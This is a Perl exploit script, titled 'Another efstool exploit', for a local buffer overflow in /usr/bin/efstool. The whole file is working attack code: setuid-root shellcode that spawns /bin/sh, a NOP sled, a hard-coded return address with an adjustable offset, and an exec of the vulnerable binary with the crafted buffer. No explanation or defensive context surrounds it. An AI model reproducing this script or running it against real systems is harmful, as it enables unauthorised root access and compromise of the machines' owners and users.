#!/usr/bin/perl # Another efstool exploit $shell = "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89". "\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89". "\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; $ret =0xbfffe590; $buf = 3000; $egg = 2000; $nop = "\x90"; $offset = 0; if (@ARGV == 1) { $offset = $ARGV[0]; } $addr = pack('l', ($ret + $offset)); for ($i = 0; $i < $buf; $i += 4) { $buffer .= $addr; } for ($i = 0; $i < ($egg - length($shell) - 100); $i++) { $buffer .= $nop; } $buffer .= $shell; exec("/usr/bin/efstool $buffer");